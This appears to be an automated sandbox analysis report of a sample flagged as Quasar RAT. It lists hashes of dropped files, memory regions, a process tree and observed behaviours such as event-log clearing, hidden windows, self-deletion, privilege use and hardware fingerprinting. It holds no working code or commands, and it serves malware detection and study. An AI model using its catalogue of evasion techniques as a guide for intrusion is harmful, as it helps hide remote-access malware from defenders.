| SHA512 | d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045 |
C:\Windows\$sxr-cmd.exe
| MD5 | 8a2122e8162dbef04694b9c3e0b6cdee |
| SHA1 | f1efb0fddc156e4c61c5f78a54700e4e7984d55d |
| SHA256 | b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450 |
| SHA512 | 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397 |
memory/1452-74-0x00007FFF167F0000-0x00007FFF169E5000-memory.dmp
memory/1452-75-0x00007FFF16290000-0x00007FFF1634E000-memory.dmp
memory/1452-76-0x000002A6C1CA0000-0x000002A6C2224000-memory.dmp
memory/1452-77-0x000002A6CA6F0000-0x000002A6CAEBA000-memory.dmp
memory/1452-78-0x000002A6CAEC0000-0x000002A6CB2FE000-memory.dmp
memory/1452-79-0x000002A6CB300000-0x000002A6CB3B2000-memory.dmp
memory/1452-80-0x000002A6C1980000-0x000002A6C19A2000-memory.dmp
memory/1452-81-0x00007FFF167F0000-0x00007FFF169E5000-memory.dmp
memory/1452-89-0x000002A6C2BD0000-0x000002A6C2C20000-memory.dmp
memory/1452-90-0x000002A6C2CE0000-0x000002A6C2D92000-memory.dmp
memory/1452-91-0x000002A6C2F70000-0x000002A6C3132000-memory.dmp
memory/1452-101-0x000002A6C2C20000-0x000002A6C2C5C000-memory.dmp
memory/1452-102-0x000002A6C2B80000-0x000002A6C2BCE000-memory.dmp
memory/1452-104-0x00007FFF16290000-0x00007FFF1634E000-memory.dmp
memory/1452-105-0x000002A6C2C60000-0x000002A6C2C96000-memory.dmp
memory/1452-103-0x00007FFF167F0000-0x00007FFF169E5000-memory.dmp
memory/4864-106-0x0000000140000000-0x0000000140028000-memory.dmp
memory/4864-107-0x0000000140000000-0x0000000140028000-memory.dmp
memory/4864-109-0x00007FFF16290000-0x00007FFF1634E000-memory.dmp
memory/4864-108-0x00007FFF167F0000-0x00007FFF169E5000-memory.dmp
memory/3024-110-0x0000000000400000-0x0000000000420000-memory.dmp
memory/3024-111-0x0000000000400000-0x0000000000420000-memory.dmp
memory/4864-113-0x0000000140000000-0x0000000140028000-memory.dmp
memory/612-117-0x00000173C6C30000-0x00000173C6C52000-memory.dmp
memory/1020-122-0x0000013B75EE0000-0x0000013B75F07000-memory.dmp
memory/668-143-0x00007FFED6870000-0x00007FFED6880000-memory.dmp
memory/612-131-0x00007FFED6870000-0x00007FFED6880000-memory.dmp
memory/668-126-0x000001A7814A0000-0x000001A7814C7000-memory.dmp
memory/612-121-0x00000173C6C60000-0x00000173C6C87000-memory.dmp
memory/1020-133-0x00007FFED6870000-0x00007FFED6880000-memory.dmp
memory/3024-115-0x0000000000400000-0x0000000000420000-memory.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WER93B0.tmp.csv
| MD5 | 81b6a1aa910498f1b9f06a92554453c7 |
| SHA1 | 4c9b88339aacc52b0cae5549f1044d23902aade2 |
| SHA256 | 1986f4095088dc6ec0d62478ad96282f034d33f0cb9966811ab676196710bba0 |
| SHA512 | 992bd45b12f7adb74a7760b91e045a3ab7fbdf6540c4e9b7a03547ed00e26242f75948f5ae4d6b195fc3fe46986b9e2274ea8981ce5f78694c7172da28413230 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER93D0.tmp.txt
| MD5 | 2ff2d0f22cfe74a4c03fa415fb61613d |
| SHA1 | 3dc75fdeed4c5d470dad4645431eb069448525a5 |
| SHA256 | 7b2a2a42d529f4b8f43b050853f4914b7c521ce94d33c19d5c4689afc51b985b |
| SHA512 | 0e0b55e132ac3d75439a8e2cff48f78a0f9662d693a434b60f7edd276a8bb366a26d32ca55e1da95375095601ccff0bf4367167d0fa371dac20d9b2f22edcdfd |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER943E.tmp.csv
| MD5 | 6be419f46a1070a4f7586d03536ec634 |
| SHA1 | 6307315ec2cbf31e9f878c1d69ea91d78d81e4ac |
| SHA256 | ee93755e9409aa4914055e2247c00ebde6da8f73f12d6294a7b9c5afd5b265b9 |
| SHA512 | 48911ee88e830898db5bf9dbe970c945d9ff89d641fe77b7ba12d0ed28b77bd84e21c4ccbb3dacfe503a16642e8d7282a65b7f128736a8a1eb08eedd9ca9b039 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9450.tmp.txt
| MD5 | e6f4de895e2235f6f56667b098b38ace |
| SHA1 | 18aa5b7b8f62e7959c1f64db4683b55d47f6e00d |
| SHA256 | 7fe01fe3002f96bb8259bf7102e7ff03c000b19dc43ba99fb4111dc130d4eab3 |
| SHA512 | 1baf657b291066d3198e4ecc361325aa17aaefb39f1dc00fc5903a0c686d59651cefcc8b5eb9160d9408795887f4e9dd8538f800ba3d567a832fcef658c40c84 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9460.tmp.txt
| MD5 | d5329c62382169aa20e0782e647bd479 |
| SHA1 | 2baa25cee8611a3d0f5140e73f96fd223bf87228 |
| SHA256 | 08a20fb30fb89c6be1aa5262aec8e70dee8b69f32405c6afe0ac30aa2e900493 |
| SHA512 | 0829ab94269729392ac47c6b7350f54746932f2bb171430a1b56eac06e80d308443f802538671337e5edfa2efaf59c7997429abb4dcd2197512a23e4c0506732 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-18 13:35
Reported
2024-08-18 13:37
Platform
win10v2004-20240802-en
Max time kernel
60s
Max time network
60s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5804 created 376 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation | C:\Windows\$sxr-mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-mshta.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-cmd.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
Hide Artifacts: Hidden Window
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\$sxr-mshta.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
